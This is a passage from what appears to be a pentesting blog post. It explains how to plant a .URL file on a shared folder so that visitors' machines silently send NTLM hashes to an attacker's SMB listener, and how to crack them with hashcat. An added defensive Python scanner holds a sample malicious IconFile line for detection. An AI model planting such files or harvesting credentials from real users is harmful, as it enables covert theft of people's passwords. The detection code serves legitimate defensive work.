A better way to capture hashes with no user interaction by @_markmo_
I found a better way to capture hashes from a post by @insertscript on twitter
This uses a .URL file that references environment variables and causes the user's machine to connect to the attacker's file share without any user interaction. Here is the quote from @insertscript: “As soon as explorer.exe views a folder, which contains a .URL file, it will lookup any specified environment variable like %PATH% or %USERNAME% before sending the actual request, therefore leaking its content to the attacker controlled server.” (https://insert-script.blogspot.com/2018/08/leaking-environment-variables-in_20.html)
Right, first we set up an SMB listener on our attacking machine (probably on an internal network, as most companies block outbound SMB).
Next, we create a text file on a file share, hopefully somewhere with a lot of traffic like a shared documents folder. (Once you create the file you can drop it on any share.)
Paste this into the text file:
You only need to replace the IconFile path with the share you set up in the first step with SMBServer, Responder or Inveigh.
***PLEASE NOTE*** leave the %USERNAME%.icon exactly where it is. This is what initiates the connection.
Here is what it should look like when you are done:
Now, make sure you have "show file extensions" and "show hidden files" turned on.
Rename your file with a .URL extension and the magic will begin.
It should look like this when you are done:
You should ALREADY have a connection in your smb listener!
Now anyone who visits that share will automatically attempt to authenticate to your SMB listener. If you want to be extra sneaky, change the icon of your .URL file. Also, see the note at the end.
Now to crack with hashcat. Copy the hash.
Paste it into a file (I'm just echoing it to a file).
Run hashcat and hopefully the password is in your password list.
Hooray, cracked it!
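Because the trigger is nothing more than a shortcut entry that resolves to a UNC path and expands an environment variable, a defender can hunt for these files on shares instead of waiting for the SMB authentication to show up. The following is an added example, not code from the original post or from @insertscript: a Python scanner that parses .URL files tolerantly, flags IconFile, URL and WorkingDirectory values that point at a UNC share or embed %VAR% references, and walks a directory tree (for example a mounted share). The two shortcut bodies, the host name PLACEHOLDER-HOST and the file names are constructed for the demo.

```python
"""Hunt for .URL shortcuts whose icon or target forces a UNC lookup (constructed demo, not the post's own code)."""
import re
import tempfile
from pathlib import Path

# %NAME% style environment-variable references that explorer.exe expands before fetching
ENV_VAR_RE = re.compile(r"%[A-Za-z_][A-Za-z0-9_]*%")
# a UNC path: two leading backslashes, a host component, then a separator
UNC_RE = re.compile(r"^\\\\[^\\]+\\")

# Constructed sample: a normal intranet shortcut with a local icon resource
BENIGN_SAMPLE = (
    "[InternetShortcut]\r\n"
    "URL=https://intranet.example/\r\n"
    "IconFile=C:\\Windows\\System32\\SHELL32.dll\r\n"
    "IconIndex=1\r\n"
)

# Constructed sample in the shape the post describes: IconFile on a remote share, name built from %USERNAME%
SUSPICIOUS_SAMPLE = (
    "[InternetShortcut]\r\n"
    "URL=https://intranet.example/\r\n"
    "IconFile=\\\\PLACEHOLDER-HOST\\share\\%USERNAME%.icon\r\n"
)


def parse_url_file(text):
    """Tolerant INI-style parse: lowercase key -> value for every key=value line, first occurrence wins."""
    entries = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("[", ";", "#")) or "=" not in line:
            continue
        key, _, value = line.partition("=")
        entries.setdefault(key.strip().lower(), value.strip())
    return entries


def suspicious_values(entries):
    """Return (key, value, reasons) for entries that would make explorer.exe reach out to a remote host."""
    findings = []
    for key in ("iconfile", "url", "workingdirectory"):
        value = entries.get(key)
        if value is None:
            continue
        reasons = []
        lowered = value.lower()
        if UNC_RE.match(value) or lowered.startswith("file://\\\\") or lowered.startswith("file:////"):
            reasons.append("points to a UNC share")
        names = sorted({m.group(0) for m in ENV_VAR_RE.finditer(value)})
        if names:
            reasons.append("expands environment variable(s) " + ", ".join(names))
        if reasons:
            findings.append((key, value, reasons))
    return findings


def scan_tree(root):
    """Walk a directory (e.g. a mounted share) and map each flagged .url path to its findings."""
    results = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() != ".url":
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        findings = suspicious_values(parse_url_file(text))
        if findings:
            results[str(path)] = findings
    return results


def demo_scan():
    """Write both constructed samples into a temporary tree and scan it; returns the scan result."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "Shared Documents").mkdir()
        (root / "Shared Documents" / "intranet.url").write_text(BENIGN_SAMPLE)
        (root / "Shared Documents" / "suspicious.URL").write_text(SUSPICIOUS_SAMPLE)
        return scan_tree(root)


if __name__ == "__main__":
    for path, findings in demo_scan().items():
        for key, value, reasons in findings:
            print(f"{path}: {key}={value} ({'; '.join(reasons)})")
```

Run it against a copy or mount of the share you want to audit (scan_tree(path)); an IconFile or URL that is both a UNC path and contains a %VAR% reference is the pattern worth alerting on, while a UNC icon path alone can be legitimate on some intranets and deserves a look rather than an automatic block. Pair the scan with blocking outbound SMB at the perimeter, which the post already notes most companies do.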
Huge thanks to @insertscript for sharing that info.
Feel free to follow me on twitter @_markmo_
I try to share what I learn as so many have done for me.
FINAL NOTE. While testing I found some weird behaviour when I tried to use the same filename more than once that prevented things from working correctly. To make your life easy, just create a unique filename every time (1.url, 2.url, etc.).